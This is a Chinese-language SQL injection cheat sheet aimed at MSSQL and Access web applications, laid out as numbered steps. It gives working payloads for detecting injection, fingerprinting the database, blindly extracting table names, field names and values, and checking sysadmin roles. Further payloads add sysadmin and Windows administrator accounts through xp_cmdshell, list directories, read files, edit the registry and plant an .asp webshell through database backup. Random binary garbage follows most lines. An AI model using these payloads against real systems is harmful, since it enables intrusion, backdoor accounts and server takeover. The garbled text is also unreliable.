1.判断是否有注入;and 1=1 ;and 1=2 2�%vG7o�,#
2.初步判断是否是mssql ;and user>0 !+�(�H(,gI
�x�M$A�hH
3.注入参数是字符'and [查询条件] and ''=' aSI�o�q}c(
S|]\q-qA&
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ��gP`CQ0�t
R�%"'k<`#�
5.判断数据库系统 P���AXm���
:"�gu�=u!
;and (select count(*) from sysobjects)>0 mssql �� ?�%*p!m
�:kv�Q3E0
;and (select count(*) from msysobjects)>0 access V�^< Zs//7
pYh\l�.@qf
!d�&SVS^mo
y��>0Gmr�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Fi�KG�B\_]
|Q�$Dj!!1P
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ?�u>A�2Vc!
%*OQH?pyx}
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Q-�K�B�Q�c
{J-Ojw|Y b
9.(1)猜字段的ascii值(access) H^�+Z��nmo
~^l;~&����
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �x#fv<Cj4�
KebC$�g@W�
(2)猜字段的ascii值(mssql) A����'n{K#
7MIrr�h��k
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 \5f��vD8>H
0�+NGFX�\p
10.测试权限结构(mssql) �@4Lo���l2
,Bl_6��ZaL
dst!VO:�
M
{��dwlW`{�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �n(
zz�H��
D{6<,#P{w�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- M=4`^�.Ocm
T�!-ly7-�`
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- w[#*f?a�t~
W8�M(@*
T�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �Z<#h$XUA�
�Lc0=5]D��
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ;Q��idf�}:
=lL)g"x�X�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Tr,�
��z�V
�n@J>,K_�B
;and 1=(select IS_MEMBER('db_owner'));-- '���s$/-AV
.gY=<bG/fA
;_m�;�:<�
V!QC��.D�<
11.添加mssql和系统的帐户 d'[q2y?6�N
8zQN�[�[#n
;exec master.dbo.sp_addlogin username;-- �o@ @|�4
F
;exec master.dbo.sp_password null,username,password;-- �_% i!Ly�G
E+J��+�f�i
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- E�hq�
[4}�
|OIU)�53A-
;exec master.dbo.xp_cmdshell 'net user username password ���w{ �P�l
��av~���kF
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- FY�
pspv?4
V^_�U=Ed@M
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �Z9j`<VgN
G�4uA&"OE
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ,�;��n�[_f
�4j��C7>mE
�>XW���-W
�B�^C�5�?�
12.(1)遍历目录 j�|���LO�g
5:%`��&�B\
;create table dirs(paths varchar(100), id int) 4c<\_\\c�k
��szp.\CMz
;insert dirs exec master.dbo.xp_dirtree 'c:\' sU/vXweky"
W�&�����7(
;and (select top 1 paths from dirs)>0 go�c; �.~?
@>`q�f�y?
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) fYlq�aO4�[
d�g�&�G�Mo
S2EV[K8�#�
�`E��|>K\
(2)遍历目录 b{;LbHq�+G
(�+(�bw4V/
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- z�EDN^K �'
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �\zhCGDm1_
�;��f
�/2u
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 UTqKL*p523
��1��z_1Hl
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 e^U�UR-K%�
�)NO��,�G
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 W
H�af}.�V
d3NER}�f4V
Qj�mo{'��d
z�pg5�12\y
13.mssql中的存储过程 tg��7QX/KX
_��o=�=��
xp_regenumvalues 注册表根键, 子键 9/{ 8Y���&
A��@�e!~��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Uur�p�ho_~
h{^��M�dYJ
xp_regread 根键,子键,键值名 {Rn*��)D9
]��P�B95�%
;exec xp_regread 7�A�c.^rv5
60l�!3o"p!
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 M�HS|gR�.c
q><wzCnRu~
xp_regwrite 根键,子键, 值名, 值类型, 值 ;�A�0�ZcgF
�(O/W�`q�o
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �$F6GCM3Cx
G��`f|#-}�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 gi+FL_8CzU
!ZY1��AhGZ
xp_regdeletevalue 根键,子键,值名 y�:�k7�eE"
S";}gw�?r6
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 \/9�O5`u*V
n!U�1�cB�{
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 6n
H'NNS:J
s\(@�f4�p�
-�c#vWuLl�
u�$qaz�j��
14.mssql的backup创建webshell ��Y6�a9S`o
G6qFAe�pwi
use model �cL4Xh|NBp
�F��<{k~ �
create table cmd(str image); &�D&U!�3~(
R�p>%umDyL
insert into cmd(str) values (''); ��SP��nW�8
0�>�
Qqs�Q
backup database model to disk='c:\l.asp'; >RrG&W�v59
gp+@+i>b+[
lU`�t~|>r+
>AWWwq� -�
15.mssql内置函数 @*WrHo�a2N
<2wC)l3j*�
;and (select @@version)>0 获得Windows的版本号 DIgu�r}q)@
����A(z
m�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa QiaB�Z�Aol
W�r�8�}=\/
;and (select user_name())>0 爆当前系统的连接用户 K�K�4rVb:-
[B�j\h7�G�
;and (select db_name())>0 得到当前连接的数据库 �V�Rg�
��y
$<L@B�|}F)
Yw\lNhoPS�
/�1eeNb�d�
16.简洁的webshell E�9]*!�^=/
��P�R%n>a#
use model 3�!�8�u��
�$5D��lCN�
create table cmd(str image); �����fFXnD
��9&s�>RJ
insert into cmd(str) values (''); �J��2�k4k�
sIR�fC<
/P
backup database model to disk='g:\wwwtest\l.asp';
